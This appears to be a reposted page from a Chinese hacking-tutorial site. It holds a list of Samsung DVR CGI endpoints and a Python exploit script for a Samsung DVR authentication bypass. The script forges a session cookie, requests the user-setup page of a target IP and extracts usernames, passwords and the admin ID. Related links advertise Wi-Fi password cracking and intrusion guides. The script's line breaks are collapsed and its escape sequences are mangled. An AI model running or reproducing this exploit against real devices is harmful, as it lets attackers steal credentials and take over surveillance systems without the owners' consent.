发布时间:2014-04-28 12:21:59作者:知识屋
/cgi-bin/camera_privacy_area /cgi-bin/dev_camera /cgi-bin/dev_devinfo /cgi-bin/dev_devinfo2 /cgi-bin/dev_hddalarm /cgi-bin/dev_modechange /cgi-bin/dev_monitor /cgi-bin/dev_pos /cgi-bin/dev_ptz /cgi-bin/dev_remote /cgi-bin/dev_spotout /cgi-bin/event_alarmsched /cgi-bin/event_motion_area /cgi-bin/event_motiondetect /cgi-bin/event_sensordetect /cgi-bin/event_tamper /cgi-bin/event_vldetect /cgi-bin/net_callback /cgi-bin/net_connmode /cgi-bin/net_ddns /cgi-bin/net_event /cgi-bin/net_group /cgi-bin/net_imagetrans /cgi-bin/net_recipient /cgi-bin/net_server /cgi-bin/net_snmp /cgi-bin/net_transprotocol /cgi-bin/net_user /cgi-bin/rec_event /cgi-bin/rec_eventrecduration /cgi-bin/rec_normal /cgi-bin/rec_recopt /cgi-bin/rec_recsched /cgi-bin/restart_page /cgi-bin/setup_admin_setup /cgi-bin/setup_datetimelang /cgi-bin/setup_group /cgi-bin/setup_holiday /cgi-bin/setup_ntp /cgi-bin/setup_systeminfo /cgi-bin/setup_user /cgi-bin/setup_userpwd /cgi-bin/webviewer
#!/usr/bin/env python # #三星test import urllib2 import re import sys if __name__ == "__main__": if len(sys.argv) != 2: print "usage: %s [TARGET]" % sys.argv[0] sys.exit(1) ip = sys.argv[1] headers = {"Cookie" : "DATA1=YWFhYWFhYWFhYQ==" } print "SAMSUNG DVR Authentication Bypass" print "Vulnerability and exploit by Andrea Fabrizi <andrea.fabrizi@gmail.com>n" print "Target => %sn" % ip #Dumping users print "##### DUMPING USERS ####" req = urllib2.Request("http://%s/cgi-bin/setup_user" % ip, None, headers) response = urllib2.urlopen(req) user_found = False for line in response.readlines(): exp = re.search(".*<input type='hidden' name='nameUser_Name_[0-9]*' value='(.*)'.*", line) if exp: print exp.group(1), exp = re.search(".*<input type='hidden' name='nameUser_Pw_[0-9]*' value='(.*)'.*", line) if exp: print ": " + exp.group(1) user_found = True exp = re.search(".*<input type=hidden name='admin_id' value='(.*)'.*", line) if exp: print "Admin ID => %s" % exp.group(1) if not user_found: print "No user found."
2011-06-17
电脑开机时出现lass.exe进程是病毒吗?
自拍须谨慎!教你如何通过照片定位查看拍摄地点
电脑病毒最基础知识
黑客学员必须了解的C语言技术
精典详细内网渗透专题文章
教你破解Tp-Link的无线路由密码
解决SecureCRT中文显示乱码
QQ电脑管家和360哪个好?横评实测对比
攻防实战:无线网络路由入侵过程